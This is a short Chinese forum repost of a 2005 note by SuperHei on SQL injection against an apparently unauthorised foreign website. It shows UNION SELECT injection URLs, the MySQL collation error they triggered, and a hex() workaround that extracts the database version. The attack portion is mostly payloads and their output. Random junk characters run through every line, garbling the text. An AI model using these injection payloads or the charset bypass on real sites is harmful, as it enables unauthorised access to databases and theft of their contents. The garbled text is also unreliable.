本文作者:SuperHei ^, b$ V) ]; O+ L& h' [
文章性质:原创3 r! @+ u3 u/ H5 [0 J" L) T
发布日期:2005-10-18
8 J5 _6 b1 n9 M$ P0 B测试个国外的站时:1 e1 e) O7 L4 `
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
% d( U' T& x" W1 T8 A返回错误:: Z% d8 v6 C5 F; V
Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
# A4 U3 o( E7 O- FMySQL Error No. 126
8 X: ]% G& i7 |3 a+ m; h% ^/ A, M看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。( M# [4 h( ?0 d1 s% j# l
解决办法:转为其他编码如hex。! B2 Z6 i* ^# [
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
5 K" y% R2 y7 _# Z' u" ~, h成功得到hex(version())的值为:
) p4 W- `, @% m: \342E312E332D62657461
1 E) H9 F- `: o回Mysql查询下得到:
' x, T& R: r: @! a- \mysql> select 0x342E312E332D62657461;
) G% q- q A( Q! B4 Z+------------------------+
! a: C& A2 Y0 I| 0x342E312E332D62657461 |
* J1 D( n/ y8 c+------------------------+- X9 C& O6 O6 u) V
| 4.1.3-beta |
% L8 o/ [2 F& U* V+------------------------+
* ~- t) `( V. e- Z1 row in set (0.00 sec)
+ @5 |6 J1 ^( \# Y1 H) u( A/ z8 @' R1 ?2 l
|
发表于 2012-9-15 14:04:54
收藏
支持
反对